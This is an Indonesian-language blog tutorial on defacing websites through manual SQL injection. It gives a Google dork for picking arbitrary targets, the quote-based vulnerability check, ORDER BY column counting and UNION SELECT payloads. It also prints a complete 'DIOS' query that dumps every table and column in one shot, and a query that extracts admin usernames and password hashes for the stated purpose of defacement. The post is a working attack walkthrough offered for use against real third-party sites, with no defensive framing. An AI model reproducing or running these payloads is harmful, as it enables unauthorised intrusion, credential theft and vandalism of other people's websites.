TOP-LEFT ADS

Deface sql injection with dios

Sql injection with Dios


assalamualakum wr wb,
kenalin saya ./Mar22 / mar (ga penting)

Kali ini  mar mau share cara deface menggunakan teknik sql injection manual with DIOS. SQL Injection merupakan teknik Hacking dimana QUERY SQL di injectkan melalui URL yang selanjutnya akan diproses oleh komputer. Lalu apa itu DIOS? DIOS merupakan singkatan dari DUMP IN ONE SHOT. Maksud dari teknik ini adalah memunculkan seluruh isi database dalam satu query saja.



 Google Dork
- inurl:detailnews.php?no=1

1. langsung ae ke google dan pilih target,

2. untuk cek vuln nya kalian bisa menambahkan tanda kutip ( ' ) di belakang url,
contoh : site.com/detailnews.php?no=1'
kalo error ada bacaan

"You have an error in your SQL syntax"atau halaman webnya berubah menjadi kosong/error.

3. sekarang tinggal kita cari tau jumlah TABLE yang ada pada databasenya,
dengan ORDER BY
Contoh :
site.com/detailnews.php?no=1+order+by+1--
site.com/detailnews.php?no=1+order+by+2--
site.com/detailnews.php?no=1+order+by+3--
sampe ketemu error nya,
misalkan error nya di angka 7, berarti jumlah ada 6,
                              " no error"

                                 "error"

4. Skrng kita cari tahu table yg  vulnerable  dengan masukan query UNION SELECT
contoh :
site.com/detailnews.php?no=1+union+select+1,2,3,4,5,6--
nanti akan muncul angka, pada gambar muncul angka 2,

5. Pada gambar diatas, muncul table nomor berapa saja yang vulnerable, disitulah exploitnya dimasukan. Caranya, lihat dulu nomer yang vulnerable, lalu masukan QUERY DIOS pada nomor yang vulnerable / muncul.
contoh :
site.com/detailnews.php?no=1+union+select+1,EXPLOIT,3,4,5,6--

Exploit nya :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Nanti akan keluar seperti ini,

5. lalu kita pilih yg mau di inject,
Karena ini buat depes, mar akan inject bagian admin,
contoh :
site.com/detailnews.php?no=1+union+select+1,group_concat(username,0x3a,password),3,4,5,6--

biasanya password bisa berbentuk md5 dan lain lain,

sekian tutorial dari mar :*
jika kurang jelas tutorial nya kamu bisa cari tutorial lain :)

0 Response to "Deface sql injection with dios"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel